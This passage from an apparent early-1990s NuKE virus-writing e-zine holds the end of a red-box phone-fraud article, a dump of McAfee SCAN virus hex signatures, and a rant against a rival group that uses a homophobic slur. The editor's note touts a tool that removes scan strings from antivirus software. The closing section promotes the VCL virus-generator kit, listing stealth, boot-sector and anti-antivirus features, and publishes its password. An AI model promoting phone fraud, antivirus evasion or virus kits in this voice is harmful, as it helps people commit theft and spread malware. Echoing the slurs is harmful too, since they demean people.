Local 5% or less
Long-distance 25% or less
International 75% or less
Closing
~~~~~~~
I've found red boxing to be a great form of phreaking. There's no risk
of being caught and you can call anywhere in the world for free -- all it
takes is a $30 investment and the willingness to put up with the hassles.
Plus, you get the added bonus of being able to laugh to yourself next time
you see some chump actually putting real money in a pay phone (gasp!).
Time to give credit where credit is due: I'd like to thank The Baron
and Guido Sanchez for introducing me to red boxing, and GarbageHeap for
telling me some of the tricks of the trade (come back to Chicago soon!).
Also, some of the information in the Autumn 1992 issue of 2600 magazine and
in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was
referenced in this article. To everyone, your help is much appreciated.
Well folks, get going, and have fun with your new toy!
Nowhere Man/NuKE
===========================================================================
===========================================================================
SCAN v100 Virus Signitures
~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a list of all scan strings extracted from McAfee's Scan
v100. Note: No self-mutating virus signitures can be automatically
extracted from SCAN due to problems with wildcard searches. If you need the
signiture for a mutating virus not found on the list, please contact:
Screaming Radish@111:950/75 via 111:950/3.
[Note from Rock Steady: We have also included a file called MCAFEE.STR
is the product of Screaming Radish from Australia , that removes Scan
strings from any version of the AV program SCAN by McAfee. We have a
similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in
the next InfoJournal. Check it out -- are you surprised how dumb this
programs is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it!
HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan ID Virus Name Hex Signature
~~~~~~~~~ ~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[WinVir] WinVir fc061e07be6e01bf8101
[Cf] Coffee Shop e03d0a03726cb8da33cd2180fca5
[Otto] Otto 01a2ff0056b9600281c6
[J4J] Jump4Joy b8c7078bd889c1053936cd21
[I9] Ice 9 bf100303feb099b971008a25
[Tab] Tabulero 1e6a0003c32ea311002ea16c00
[Tab] Tabulero 8c06cf00be9c0033c08ed8bf8f43
[Roc] Rocko 8a865d02b93a022e30460045e2f9c3
[344] 344 8b9655028d9e2901b977003117
[Blj] Bljec 8bc82d0001a3fa00030e
[Grnt] Grunt 8b9657028d9e3001b9740031
[Cf1] Coffee Shop 1 836f12728e47120e1fb92006f3
[K4] KODE4 013b45017402ebef83c703
[OW] 384 be7002bf4b02b92500fcacaae2fc
[1014] 1014 83fbf07503e98b00b000
[104] 104 81c7030126803d06740a
[3Sht] Triple Shot bef11ab9e70cfdf3a5fc
[439] 439 8a84b301a20201e83d017413
[595] 595 fe873e008a973d0080fa01
[Abrx] Abraxas 81ed060181fc4144740b
[Acd] Acid bb32018a273226060190882743
[Agn] Agena 832e0200518b1e02002bdd
[Cpt] Capital 81eb0c018db71f01b98803
[Cybr] Cyber 8985a904a192002e8985ab04
[Cerb] Cerburus b86035cd21fc8bfb8d369502
[Chad] Chad 01240a3c0a7526b80300
[Coa] Coahuila 81ed30018db6f102bf0001b90300
[GTk] Telekom 8a9c2f058dbc2001b90f04
[R715] Rebo-715 bd04018b6e0081c5060183ed40
[Qo] Quake-o 81ed07018db61e01b9d4012e8134
[Les] Les 83ee038cc00510002e03
[Hi] Hi 83ed0633c08ed8813e6401
[Fune] Fune 83c6e9b90600fcf3a5ffe2
[Eof] End-of b80f03b104d3e8bbff0f03d839
[Fam] Fam fd0875f1f6de80e60132ed
[IOU] IOU 019c0eb80335cd21891e8601
[IT] IT 899ef8028c86fa02b41a8d96fc02
[Jeru] Jeru 8b1e010181c3030183eb708b872300
[J26] July 26 090189160b0152b41abae8fd
[P5220] Pas-5220 8b3e6a008a85200030e431d2
[Ngs] Nygus 8c9cfe028ed8b04e38068803
[S3d] Silver 3d b8931b50e8300259ff36c420
[PI] PI a11f013d0202740b8cc82d10
[NPX] NPox 2.0 b8cdabcd2181fbcdab74640e
[NPX] NPox 2.1 b8dcabcd2181fbdcab74640e
[Tim] TimeMark 892656008cd32e891e54008ccb
[Rkm] Reklama f3b980008cc0408ec08cdb3bc37404
[Soy] Soyun e97c05cd218cc983c110
[SPh] Swiss Phoenix 0726803eff04ff7501
[Wlk] Walker b8840050e92c07902e8c1eee07
[Mds] Madismo b85315ba72010500003b060200731a
[VM] VM 81ff8d00750304084757cf
[7S] 7thSon 81ed0301be8b0103f5bf0001
[BUG] Bogus 21b44febe8c35c2a2e2a00
[BUG] Bogus 1fa113048bc8b106d3
[BUG] Bogus eb69900002100038000100
[kiri] Hara bef6fd3a83c1fd7431803e
[LZ2] LZ2 fdbef80aebbc62e9c204000364e9
[LZ] LZ cdf1dae3629ae5f2febf48
[Fnz] Fri13-nz 16070183c203cd217217b440b96f
[For] Forger2 81ff78567507e9e900fe023714fc
[OW] Yukon b9970090ba0001cd21b457
[Stb] Stealth ff0e1304fac7064c00a700
[Msht] Mugshot 8b1e1304b9060083eb0731
[Mon] Monkey b90002fc268a05342eaae2f8
[Arag] Aragon 33c08ed8be137cb9a5018a3eba
[1554] Ten_bytes fe5a580306410383d2000306
[VTS] VTS 071e26a12c000bc075
[BKil] Boot Killer 33ffb90002f3a4ea1f000030061fb40d
[NOP] NOP 8bf4fba11304
[Klr] Kilroy 904b494c524f59
[H-2] H-2 eaa701c007444f53
[WM] Windmill 13048b04488904
[Curse] Curse fbb8c0078ed81eb8520050cbb840008ec0
[Filler] Filler f7e32d00108ec0
[MBug] Music Bug 8cc88ed88ec08ed0bc00f0
[Iboot] Israeli Boot cd13b80202b90627ba0001
[Ghost] Ghost 90ea59ec00f09090
[Mich] Michaelangelo a14e00a30c7ca113044848a3
[Stoned] Stoned ab004848a31304b106d3e0
[Emp] Empire ea9f01c007
[Mardi] Mardi Bros. d88ed0bc00f0fbe827
[EDV] EDV 751c80fe0175175b071f5883
[Alameda] Yale/Alameda b400cd13720db801
[Loa] Loa Duong fb8ed8fe0e1304a11304
[Teq] Tequila 8ed3bc007cfb33ff832e13
[Micro] Microbes 8ed0bc00f0fba113042d04
[A-Vir] Anti-Tel fb8ed8a1130448a3
[P-2] Print Screen-2 7401bf0300b92000f3a4
[PrtScr] Print Screen cd05fec8a26001c36f6e2d
[Korea] Korea 8ed0bcf0fffbbb1304
[Killer] Disk Killer c310e2f2c606f301ff90eb55
[Brain] Pakistani Brain c30002e2f4a113042d07
[Form] Form e8b2005a5e1f33c050b8007c
[Ping] Ping Pong - B a1f581a3f57d8b36f981
[Tboot] Typo Boot 241355aa
[Flip] Flip fbb80300e81f0006b8
[Joshi] Joshi f3a48cc00520008ec0bb
[1253] 1253 e4cd1333db2e8a36207d2e8a
[Atx] Anthrax 75ed061e071f32f6b9020033
[Invader] Invader 8ed8a11304b106d3e08ed8
[Queen] Queen's 8ed88ed0bc007c50fb33
[Invader] Invader b3ffb84342cd213d78567513072e
[Genb] Generic Boot fab8c0078ed8bf00
[OW] Leper baab03b43bcd21463b360d03
[OW] V1-Not b9ff00ba0000cd26b400cd16b80300cd10
[OW] 8000 7504b000eb02b001a2a43c
[OW] Lug e8d90159b88c0650e8d10159b8c306
[OW] Wake bb3f01908a27903226080190
[OW] Explode 8132f6ebd8b041e674ba40008edabb72
[OW] Dust ba9e00cd21b440b93200ba0001
[OW] Veng-B 8b1efc01b9fc008b16020283c262
[OW] Veng-C 8b1e8602cd217246909090890e8802
[OW] Veng-D 8b1eb302cd217246909090890eb502
[OW] Veng-E 8b1e2703cd217303e9dd00890e2903
[OW] Veng-F 8b1e390333c933d2cd211eb43f
[OW] Scribble ba6c03b43fcd21e82900
[OW] Banana b98b0090cd215a59b80157cd21b43ecd2159ba9e00
[OW] Leper baab03b43bcd21463b360d03
[OW] 102 ba6001b92600cd21721eb441ba5301
[OW] Blaze b91c01cd21b43ecd21b44fba0001cd21
[OW] 4915 bf3e040e5731c0509af90867
[OW] Silver3b f6b8030550e8eb0159e8a7000bc0740a
[OW] Secrets 3e01a006010ac0740b300743
[OW] Seneca 81f9bc077e1beb0190b42a
[OW] V1_1 891e70008c067200ba7400b41a
[OW] V2_0 891e82008c068400ba8600b41a
[OW] V1_0 891e5b008c065d00ba6500b41a
[OW] Aids92 48002648616802212020
[BFD] BFD bb9201eb2133c0be007cfa
[Pnz] Penza b9bc02f3a4061fb82135cd
[Mgm] Magnum b9be092e00042ef6ad
[Plu] Plutto 8b36010181ee00022e89360001
[Prm] Prime 2b01b94402512ea00701
[Sui] Suicide 81ed0701e80200eb41b9e803
[Ata] Atas b92b00b2aa8dbe6200fec23015
[Squ] Squisher ee11b844008ec0268a1db95401
[007] 007 2135a804020056051902280206
[132] 132 80f44b7549b8023dcd
[658] Something eb0e536f6d65746869
[Hck2] Hacktic2 80c6108ec25256b426
[V9] Virus9 890e6d01891671015b
[5856] Bow bec20903f3b94f002e
[vvf] VVF-34 8b1e03004081ebda0089
[1280] 1280 ba0005cd21e8d500bf5004
[2136] 2136 81c45809fb3b26060073
[VDV] VDV-853 8aa44f048dbc2001b92f0389
[Lam] Lamer 87060e0050cc589d5826
[Alb] Albanian e80000bb4c03538bfc33f6
[SilW] Silly Willy be15008b1ab9d00881e973
[Con] VCL e800005d81ed06018db61403bf000157a5a4
[Con] VCL e800005f83ef038d750de8
[Con] VCL e800005d81ed0601e8
[Dst3] Dest3 8b2e010181ed1fffe8e7ffbc4e02
[DTR] DTR 892624018cc88ed0bcf701
[Sk] Sk ee09b800008ed8893612030e1f
[Sk1] Sk1 ee090e1f0e0789366f04fcbf
[500] 500 21813e7c021e03754db452cd21
[Ash] Ash 81ed0b013ec6864702008db604
[C16] Com16850 892e333cc7061d3cffffe81301
[Hpp] Happy 8dbc190181c61201b9070090fc
[Lix] LixoNuke 015e568bfe33c08ed8c41e4c
[1182] Hellween 1182 014434803c00750c8b4401a3
[Tr2] Troi Two a384008c1e8600fbebb99c80fc
[Mch] Mocha bf0a01be96011e0e1fe8
[CV4] CV4 8d77cabf0001b90500fcf3a4
[GK] Geek 891ebb038c06bd03baa4
[557] 557 b8cdabcd213defcd7405e8
[Pia] Piazzola be6a04bf0001b4ddb900ff
[Rttl] Rattle 81ed03018d9e20018d968b013e8a8e0301
[Mex] Mexican 8a8e03013bda7405300f43
[Egn] Evil Genius b8cd7bcd2181fbcd7b747f33db0e1f
[Slv] Slovak 80bcfefc007406b8cb11
[Slv] Slovak 268a1d32d82e881d041147e2f3c3
[Req] REQ 01ba2a0003d78bdab41acd
[ZY] ZY 8b0ecb0281c100012e890ecd02
[Why] Why_win bb01018a27bb02018a07
[fizzle] DataFire fdb419cd2188466de8e2fe
[Davis] Davis b9a706fcacc0c8042e3206a706
[Cha] Chang c3fa0e1f33c08ec0bf0c00a1
[VA] VA b963068cc88ed8bf0000b8609f
[Gre] Green 8986160433ffc7454a0000
[1030] 1030 8ec033db26891fb880
[Chs] Chaser 8a160900bb38008a0732c2
[RMIT] RMIT f6e88b000bc0740ae851
[1661] 1661 fa8bece800005e81ee9a012ef684
[Ptch] Pitch ba220083c202061fb84725
[Mls] Malaise 81eb970483eb038cc82e
[Blus] Bloodlust be5d018bfeb92e01b37f
[Trk] Turkey 81eb29012ef687220101740f
[417] OMT b9890180352a47e2fa
[Topo] Topo fa0633c08ec0b82b002687060c00508cc8
[Ant] ANT 8a260701eb1290ac32c4aae2fa
[702] 702 5e3dc707751133c08bd88bcb
[205] 205 81eec900b44ebabf00
[1835] 1835 be9c0781ee030101de8904be9e07
[Krv] Krivmous c43e07010657c43e0b010657ff
[Lan] Lanc5476 8000179e83da00739581eb8b
[Lan] Lanc5882 80118b1e3a04c82ef726e904
[Lan] Lanc 9a0e02f000b8f401509a9e025e
[PA] PA-5792 3ec300417407803ec30042754a
[Cas] Casc1621 81eb070183bf010100740e8db7
[Sti2] Stink2 890e7801c6062d0101e8ab00
[Timid] Timid305 ba48ffc70655ff2400b409cd
[Tmd] Timid e80000832efcff09ba2a
[Eno] Enola 81fb91197503e91101b452
[Crk] Cracky 83ee0956fcbf0001b90500
[Mum] Mummy 04062e8c0665002e8c
[Che] Cheeba 8035264781ff6807
[Nina] Nina b90001f3a42d100050b8370150cb
[Dot] Dot Killer feb9400057f3a458ffe0be0001
[Sta] Stahl Platte b90001f3a48ec01ee9b101
[Er] Error 80fcdd7426b82135
[Sat14] Saturday 3e720201740c0106900083
[E92] Europe 92 83c62dbf000157a5a5c3
[Hre] Here 1eb8f000508becff5e0058
[Sdot] Star Dot b44fcd2173e5ff0641038cc8
[789] Dot-789 8ec0268b1e6c04891e6604
[Tum2] Tumen V2.0 e813feb4ffcd213d000074
[Key] Keypress fa2b06920383da00a39803a3
[T12] Thursday 12th 8a26290132260001be0301
[1992] 1992 d8b9a006bf03002ea0
[1992B] 1992B 2e8c0601008cc88ed8bf0300
[Mule] Mule 2e8a262f0e3e302743e2fa
[T3] Taiwan3 b8404bcd213d78567512
[T4] Taiwan4 b8504bcd213d34127510
[Fu] Fu Manchu b4e1cd2180fce1731680
[DAME] DAME be762d81f699548bdebec690
[DAME] DAME bbbaf4be84a78acb80e11f
[DAME] DAME b82846bab38df7ea2d3e21
[DAME] DAME bebaf4bb72c52b9c4810b106
[CMDR] Commander 33e4fbe87400
[Bmb] Bomber bb4d0830071e2bf68ede
[Boo] Boojum d8bb1700291e030029
[928] 928 bf000157be2b03b90300
[Mog] Mog bf0001fcffe7b40e
[880] 880 bb36008a0732c288
[Hrs] Horse cd200a0d4f4b
[334] 334 81ee0b01e80900e8
[Shld] Shield 8d0e2f0e2bcafcac
[2623] 2623 b8ab9ccd2f3d76
[LK] LK bf000189fe83eef0ff
[Em] Emmie 21c646950081f9bc
[Bt] Beast 8bf283c619bf0001b90300
[Qk] Quake 81fbba00744c891e
[981] 981 213d51907455be02
[1339] Mummy 01065c04b84242cd
[Ill] Ill ea2033ff3e8a86
[ZMT] ZMT 01b9fc00f3a4b8000159
[MPC] MPC a503b9140033f633c0
[Gls] Gliss 83bcdf04017402cd20
[Anto] Anto d87234b43fba7ffdcd
[Kzm] Kuzmitch b915038a5466309051
[Pch] Peach 53e8800050f3a6741e
[Imp] Imp 213d71197503e9bb00
[Sqk] Squawk 81bc30034d5a742e
[Troi] Troi b4fccd213ca57428
[Shd] Shield b9afb560b5b3a5
[Mnc] Munich 8d2614078cd903
[Emf] EMF 83ea03b99301cd21
[Bst] Busted 0732060601880743
[Mut] Mutating e82b004665617220
[Mut] Mutating 04d3ea83ea108cd903caba6d
[RusD] Russian 04d3ea83ea108cd903caba56
[914] V914 04bbde03b97f0058
[Bwr] Beware 8102578bd6fcb903
[1308] 1308 9047e2f8a97e39c3
[Sadt] Sadist 89261c008cc8fa8e
[DMB] DM-B bf00018bc7
[Crp] Creeper b8ff43cd218cd82d11
[1376] Hellween 81ee58015650060e
[Bob] Bob 81f9c907720680
[HS] HS b8874bcd213d636675
[MFC] Mface 3c75062ec6878a01
[DOD] DoDo 80fcab7502eb31b8
[DD] Dada 0e27062e891e2906
[Sr] Scream d8ff0e1304c51e8400
[Mlg] Malaga 01a2ca07a2db07a2
[K] Micropox 1ffd720db8f3c1cd
[JD] JD a45f57b82135cd2181
[CKs] CKsum 129c9d03079c4343e2
[109] 109 a4ba00feb41acd21ba67
[P45] P-45 b44eba270131c9cd2172
[Qt] Quiet 8cc801060c01ff1e0a
[Sh] Sh 1e650353e819005bb9
[Bry] Brainy e800005e56fa83c61b90
[CV] C 4d414effffba
[Crm] Criminal fc11742680fc12742180
[Hng] Hungarian c30eb000fad50a8807
[A16] August16 ba790203d7b41acd
[D-T] D-Tiny 07aba5b82125cd2107
[Def] Define 013dba9e00cd2193
[Mar] Marauder 5e81ee0e01e80500
[487] 487 f3bf0e0c0e579a16
[Psc] Psycho ba1603cd21726fb8
[Mn] Mannequin 813e670456441f75
[Dmo] Demolition 8d77178a04d0e0
[HW] Halloween b8b8009a44025701
[1244] 1244 b4e0fccd2180fc0375
[730] Ontario b86e4bcd213d545675
[Sov] Sov 5b0eb90001511e06b1
[1186] Lib1172 5351bb12018b0f1e5b03
[Rag] Rage ea83c5419055eb0d50
[El] Eliza 43b42acd2180fa0d75
[Bet] Beta 8bfeac32c4aae2fa
[472] ASP-472 d8bb980001d38b0f
[Plov] Plov 12b42ccd2180fa327c
[QML] QMU ed78060e1f0e07bf
[M11] MPS1.1 8b84d301408984d3
[D10] Day10 f347ba5448263915
[Tn] Tony b8b70050cb546f6e79
[JK] Joke 894e4972eab801438d
[SX] SX e70108fe0ee701be
[Bro] Brothers fc1e7c0fb413cd2f
[Sti] Stink 1f890f894f026107
[KU] KU-448 e7fe0fbe2c0190b9
[HrB] Hero-394 2e8384670310061e
[Hary] Hary bb3e0281eb2a018b
[Sqe] Squeaker fbe9b3feb000b4
[MPS] MPS 3.1 80f4a78865289047
[370] 370-B 213d55557503eb5b
[V-5] V-5 1620022e891600018a
[802] PC Flu e81f001febfefa
[M-123] Multi 8b44f4a300018a44
[Gr] Grapje f8b44732d28d36d901
[SCT] SCT b40eb202cd218cc8
[Barc] Barcelona b44a0e07cd21fcb80000
[LCV] LCV a4c31e071e8e1e260133
[1452] 1452 52e80602722ee891
[621] 621 81f9d0077503e9d2
[CRF] CRF 81ed0b01c6863d02
[RST] Reset 1fe800005d8daeaf
[Ph] PathHunt 81ed1405c3bb0501e8
[1701] 1701 81eb3101f6872a01
[408] 408 2e03015b53c33d4b
[Set] Semtex 8bf581c681028bfbb907
[Ws] Wordswap fc40741b3d4230750c
[GY] Got-you 8bf82eff2eb000cd
[D2] DIR-2 04ffbb6000b44ae8
[Ein] Einstein 8b1647008e1e4500b800
[Nbk] Nobock f88bef7451bb0001
[Jrk] Jerk e8f502e877009d5dbd00015533ed
[M128] M-128 8ec0bf0303b17df3a4
[Boys] Boys ebd85b5383c307c607
[BT] BackTime e800005bbf00018db7
[Tokyo] Tokyo 8ed0bc8c01fbb462
[Spain] Spanish e9fbfde9250b06570e07bf
[748] 748 8ed8813eac014642750881
[Spz] Spanz e800005e81ee0f018d
[Mant] Manta e814008aa42f058dbc20
[Twin] Twin-351 b810ffcd213c077507e8
[Hitc] Hitchcock b430cd213c02720ab8fe4b
[Mosq] Mosquito b8080050eb055890eb3e
[ETC] ETC e91c02eb05e9d400908b16
[Kla] Klaeren 5b81ebaf03b9a5038037
[D28] Spanish April Fool 8ed08b261400fbc6063e
[CRJ] Cracker 3a5222110a061945384129
[Bgh] Burghofer cd215b488ec0fa26c70601
[Dei] Deicide b95000ba0000cd26
[268P] V270x 8ec10650be00015631ff
[1067] 1067 cd218a4403a202018a44
[337] 337 8c4402b425ba6001cd21
[WWT] WWT b44eb90100cd217302eb
[PCV] PCV b94f072e8a9708002e0010
[2559] 2559 ed07eb0190eb0190eb0190
[Drp] Dropper 8bcdf3aa33edad91ad920a16
[Aust] Australian b87d4bcd213d545675
[144] AT144 8bfee800005e83c631a4
[Kiev] Kiev 8be9e800005b538b87
[733] 733 8b43018f06b95eff8f
[LC] Love Child f7b603fec5ebf14c6f76
[BB] Bad Boy 2eff3627010e1f2eff262501
[PS10] PrtSc d8a113042d0200a31304061f
[1963] 1963 e8bb068ec033ff33c0af
[Grb] Growing Block eb83c3202e8e068500b44a
[Raub] Raubkopi fb8cc88ec0e804fbba3f01b4
[Z900] ZK900 ea83c2042bdab44a8cc1418e
[BCV] Sentinel e583ec128c5ef455e816fe
[Spar] Sparse b8554bcd213d31127476b821
[Svir] SVir e82a0133c98a2e1a00e30dfe
[TV] Tester f3a4b409ba0301cd21baa1
[Staf] Staf e881ffb80030cd213dd207
[MX2] Mix2 e83500e81b00ba0000b9e808
[453] RPVS 8cc88ed8be01012e8b0405
[Guppy] Guppy 8bd8cd21899c95008c84
[Crazy] Eddie 8b46043bc374143d7000
[Ar] 834 e8ac02e87101e89e01e85502
[V299] V-299 b80042cd21721a33d22e8b
[Pht] Phantom ea000183ee0603d6e8c8
[Lazy] Lazy b800008ec026a142002d
[Sylvia] Sylvia ebf781f9a3467503eb
[905] 905 f1cd2181fa0e0e7459ba
[Plg] Plague c3bb34018a27322606
[T133] Tiny 133 a58ec1939191268785e0
[Pt] Patient b9b4052ea00a01bf2c012e803e09
[Hyb] Hybrid ea007497ab2780885d18d4
[LPC] Pieces ee3c00b82135cd212bdb26
[Sdm] Saddam a11304bb4000f7e32d67
[MG] MG a4c43e0600b0ea49f2ae
[S143] Swiss 143 d6cd21803c5074178bd7e8
[Label] Label bf4c005733ed8eddc4
[HNY] Happy N.Y. e8f90373358dbcfc012e
[T133] Tiny 133 bb2f06b950008bfed374
[Jus] Justice 5b83eb592e89474d2e894f4e
[Hymn] Hymn 5e83ee4cfc2e81bc4207
[Destr] Destruct e87dfc1e0e8e5e13c4
[U830] USSR 830 5b83eb0383eb312e895f
[BeBe] BeBe 0e8cc82e01060c01ea
[MGTU] MGTU e8b44e8d16030103d5cd21
[Data] DataLock ed2801be280101ee2e813c4d5a
[Lehigh] Lehigh 5e83ee038bde81eb9101
[Dm2] Doom II 3e0a014574052e033e0301
[Wisc] Wisconsin 8b0e0601be08018a0434
[170X] Cascade 31343124464c
[Lisbon] Lisbon b41acd2106568e062c00bf00005e
[Vienna] Violator b42ac6069b050190e8d6ff81
[BMon] Black Mon 25cd21a10a008ec0bb80
[Ont] Ontario 2 562e8a84e801b9e801f6
[1024] 1024 2bc875ed8bd1b80042cd21
[RKO] Rocko 8bc440b104d3e8408c
[Hal] Hallo 8cd08bd4bc0200368b0e
[Paris] Paris 21b43fb918008d1688028d3686028b1c
[Syslock] Syslock 3306140031044646e2f2
[Fish] Fish 0e01cfe800005b81eba9
[Nom] Nomen 51b9ffff9c0ee82e00599c
[2133] Scott's 8bde909081c63200b912082e
[Oro] Oropax 3e011df277d1ba00
[JoJo] JoJo 4d2bd04a4503e8458ec5
[Dance] Devil's 5e1e068cc0488ec026
[Tricks] 12 Tricks 640231944201d1c24e79f7
[Shake] Shake 31d28bcacd213d00f073
[V800] V800 51ad33d0e2fb59311547
[June16] June 4da9a52e70662e57090f
[Taiwan] Taiwan 8a0e950081e1fe00ba9e
[J13] July 13th 1200b9b1042e300446e2
[1210] 1210 c474f02e803e2f040175
[Vcomm] Vcomm b92000b44ecd21730c
[VP] VP 891e22038c062403b41abac6
[Jeru-A] Jerusalem f3a526c606fe03cb58
[C-J] Japan f581c60005803ce9
[XA1] Christmas Tree fa8bec5832c089460281
[Sorry] Sorry eb96832e120040832e03
[Rtiny] Tiny 8bfa0e1fcd3257b04df2ae
[1381] 1381 c88ed8b840008ec0fce85804803e
[Ita] ItaVir b85845894002b000884004
[Liberty] Liberty e8fdfe722a3bc17c27e8
[Vacs] Vacsina b801438e5e0e8b56062e
[Wolf] Wolf 8ec0b87725d3e326ff
[Flash] Flash b000fad50a8807eb05eac0
[Zero] Zero eb2b905a45cd602e
[A2] AIDS II a4005589e581ec0202bfca050e57bf3e01
[fume] Perfume 0406bfba0057cb0e1f8e06
[Joke] Joker 5607450721071d49276d20736f206d7563
[C-2B] DC II-b 2e8a0732c2d0ca2e
[Not] Nothing 720450eb0790b44c
[Dbase] DBASE 80fc6c74ea80fc5b74e5
[Alabama] Ala 8f061805268f061a
[Crime] DC 36010183ee038bc63d00
[DC-2] DC-2 8a9403018dbc29018d8cea06
[Ice] MIX1 43813f455875f1b80043cd21
[SurivA] Suriv A 735552495600
[Yap] Yap e800005b81eb31012ef687
[2480] Crew-2480 cd21b6008bc2b11ef6f13c
Screaming Radish/NuKE
===========================================================================
===========================================================================
A "Virus Group" or "Viral Warez?"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As a long-time figure in the virus world, I cannot help but be disgusted
by some of the upstart new "virus groups" that have been appearing in the
last six months. These so-called virus writers are little more that warez
people who like to pass around viruses instead of pirated software. For
example, there's one Toronto-based group, who shall remain nameless,
which has it's own couriers and ANSI makers. This is sickening. This
sweet-potato "virus group" consists of a bunch of geeks who get off on
mass-producing lame viruses, then typing up stupid .NFO files remeniscent
of INC and sending the package out around their local area. Too cheap
to call long-distance, too lame to phreak, these scum are largely confined
to Ontario, though they claim to have sites all over the world, which are,
of course, PRI-VATE, making them conveniently hard to reach. A good thing,
too, since these sites don't exist.
Then these faggots create their "own" virus-generator using code ripped
straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners), then
don't give credit where credit is due... This lame virus generator comes
with a nice snazzy .NFO file with huge, dripping ASCII drawings of their
group's name, nice boxes, credits, etc., straight out of an INC/TDT info
file. Not only that, but this group can't even decide it's own name, which
changes from virus to virus, from newsletter to newsletter. (Youth,
youngsters, which is it? Why not just change it to "14-year-olds?")
The membership is also constantly changing. Most members don't do shit,
while a few write tons of lame trojans and viruses so that they have
something to brag about.
VGA artists? ANSI artists? What the fuck is this? Since when did a
virus require a graphic? It seems as though the group can't decide whether
it'll put out art or viruses...
And what sort of virus group has couriers? Are their viruses so awful
that they won't spread by themselves? Why do some members have personal
LD couriers to call across town? (Too cheap to pay for local calls? When
the split to 905 occurs they'll probably have to retire!) Why do they have
couriers, period? Next thing you know they'll have full-time doc writers.
Wait, they already do! I guess the people who run this group are too dead
to think of their own shit so they have to hire others.
If we're all lucky, these people MAY go away soon, VIPER themselves
into retirement. Of course there are always plenty of groups to rise up
and take their place. There are groups that form and then break apart
because no one knows how to program. There are those one-man groups of
people who are too repulsive to get anyone to help them... I guess these
groups serve one important function -- they make the real virus programmers
look that much better. Thanks guys.
Nowhere Man/NuKE
===========================================================================
===========================================================================
VCL v2.0 Update
~~~~~~~~~~~~~~~
"What's happening with VCL v2.0?" is all we ever hear today. Well, making
a product like VCL is not as easy as you may think! Let's compare.
VCL offers the user unique user-configured viruses; if you want it to
display a message, no problem; if you wish to add a routine, no problem.
It's very flexible, unlike other virus generators. The others simply
consist of one generic virus, a simply blocks out unneeded parts to
generate your virus. The options it gives you are junk, like "Infect .COM"
or "Infect .EXE." Please, we don't need that, you could just hack out a
pre-existing virus if you want that. VCL is much more complex.
Nevertheless, we did it once with VCL v1.0, and we will continue to set the
standard with v2.0. The VCL kit is STILL undergoing construction. It will
feature a similar user-friendly environment, but the viruses produced will
be much better than before. The key word is STEALTH, v2.0 seeing the
addition of TSR viruses with numerous stealth options, some never seen or
tried before on a virus. Some of the new features of VCL v2.0 include:
o .COM, .EXE, .OVL, .SYS, and .BIN infection
o Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and
2.88M diskettes
o MBR/partition infections for hard disks
o Directory-entry infections (similar to Creeping Death)
o Incredible stealth capabilities
o Cryptex(C) encryption generation, with support for MtE and TPE
o The NuKE Encryption Device, a mutation engine by Nowhere Man
written for use with v2.0
o Anti-anti-virus options
o Improved anti-trace options
o Increased user control over virus creation (more options!)
o New effects and conditions
o Enhanced environment
v2.0 will also differ from the initial release in that it is a team effort.
While v1.0 was entirely written by Nowhere Man, v2.0 is a complete NuKE
collaboration; besides Nowhere Man, Rock Steady, Screaming Radish, TLN,
and others will be working on the project. This allows us to expand VCL in
ways that one man alone could not hope to do, a perfect example of the
increasing cohesiveness of our group.
So, when will v2.0 be completed? We can't say for certain. Already several
deadlines have been broken, and we'd rather not promise any dates. All we
can say with certainty is that it will be released before the end of the
year. Keep a look out for it, and keep those suggestions coming!
VCL v1.0 FAQ
~~~~~~~~~~~~
Nowhere Man has provided us with a list of frequently asked questions (and
their answers) concerning VCL v1.0, which we present here. He requests that
no more bug reports be made, as v2.0 is being rewritten from the ground up
and so should therefore be free of bugs in v1.0. Comments and suggestions
are still welcome, however.
Q: HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM?
A: VCL v1.0 was password-protected for this very reason: to keep lame fucks
like this from using it. I gave out the password on every NuKE site, and
relied upon word-of-mouth to spread it from there. All "good" boards
would probably get it. However, seeing as v1.0 is now becoming outdated,
I've decided to be generous and tell the password to the world: it's
"Chiba City" (typed exactly as shown, capital Cs, lower-case otherwise).
Please do not mail me (or anyone else) for the password, 'cause I'll
just delete the message. (For those who are interested, "Chiba City" was
a random phrase taken from William Gibson's _Neuromancer_. There was
some conjecture on the nets a while ago as to what it meant. It's a city
in Japan where much of the book's action takes place.)
Q: Why do you include an IDE (Integrated Development Environment)? I mean,
using an IDE is akin to a walking person intentionally crippling his own
legs or a sighted person poking her own eyes out, right?
A: Fuck off, Dark Angel. :-)
Q: How come VCL doesn't install properly? I type in the password (Chiba
City), but it says I need to reinstall from an original copy, or it
hangs when creating VCL.CFG. I'm running with (whatever)...
A: Ok, there can be several causes for this. First, VCL v1.0 will not work
with Stacker, SuperStor, or any other on-the-fly disk compressor. Sorry,
but I was unaware of this problem for quite a while, since no one I know
uses Stacker. Run it from an unStacked disk. The other problem could be
caused by a bad version of INSTALL.EXE, the installation program. I have
released a new version of it under the name NEWINSTL.ZIP (some copies of
VCL will have the new install included). If you don't already have it
and you can't install properly, try using the new version. If all else
fails, only install to C:\VCL, that should always work. Otherwise, your
problem is a corrupted .ZIP or a hacked/pre-installed copy of VCL. Use
only the original version.
Q: Where's your source code, dude? I want to hack it so I can make my
"own" virus generator, but I can't seem to find it. Is it inside the
.EXE or something? Please help me soon, a new version of IVP is due
out next week! Also, why don't you include some ANSIs with VCL and
put in a .NFO file with elaborate ASCII setups, NoWhere Man?
A: (Nowhere Man draws a gun, raises it to the head of the blithering,
fourteen-year-old Torontonian fashion-tragedy standing before him,
and pulls the trigger. KABLYAM!)
Seriously, the source code to VCL will not released to the general
public, it's for NuKE internal use only. Sorry. Nowhere Man will be
happy to answer any general questions as to the workings of the VCL
IDE/compiler, if you're wondering how it works.
Q: VCL won't compile my virus. How come?
A: There are several causes for this, too. First, you may not have your
assembler configured correctly (check it out from DOS, and be sure that
the Assembler string is set correctly), or you may not have an assembler
